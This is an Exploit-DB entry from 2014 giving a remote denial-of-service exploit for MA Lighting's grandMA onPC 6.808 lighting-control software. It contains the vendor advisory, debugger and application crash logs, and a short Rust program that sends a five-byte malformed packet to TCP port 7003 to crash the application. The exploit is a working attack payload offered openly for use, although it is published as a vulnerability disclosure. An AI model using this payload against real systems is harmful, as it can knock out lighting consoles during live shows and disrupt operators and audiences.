MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service

EDB-ID:

32704

CVE:


EDB Verified:

Author:

LiquidWorm

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2014-04-05

Vulnerable App: 
/*

MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit


Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)

Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.

Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.

===========================================================================

(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000      lock btr dword ptr [eax],0   ds:002b:3535393f=????????

--

303.640 GMA : RR NEW  STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC  : ******* EXCEPTION **************************
367.180 CC  : * ACCESS_VIOLATION
367.180 CC  : * EAX = 37363341  EBX =  6D856B0
367.180 CC  : * ECX = 37363339  EDX =  B78F41C
367.180 CC  : * ESI = 37363341  EDI = 3736333D
367.180 CC  : * DESKTYP : GMA [Windows]
367.180 CC  : * VERSION : 6.808 STREAMING : 6801
367.180 CC  : ********************************************
367.240 CC  : 0x775522c2 RtlEnterCriticalSection() + 0x12

===========================================================================


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php


31.03.2014

*/


use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;

fn bann() {
	println!("
	+======================================+
	| grandMA onPC 6.808 Denial of Service |
	|--------------------------------------|
	|                                      |
	|           ID: ZSL-2014-5183          |
	+======================================+
	");
}

fn main() {
	bann();
	println!("\n[*] Sending packet to local host on tcp port 7003\n");
	let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
	let mut socket = TcpStream::connect(addr).unwrap();
	socket.write(bytes!("\x74\x30\x30\x74\x21"));
	println!("[*] Crashed!\n");
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services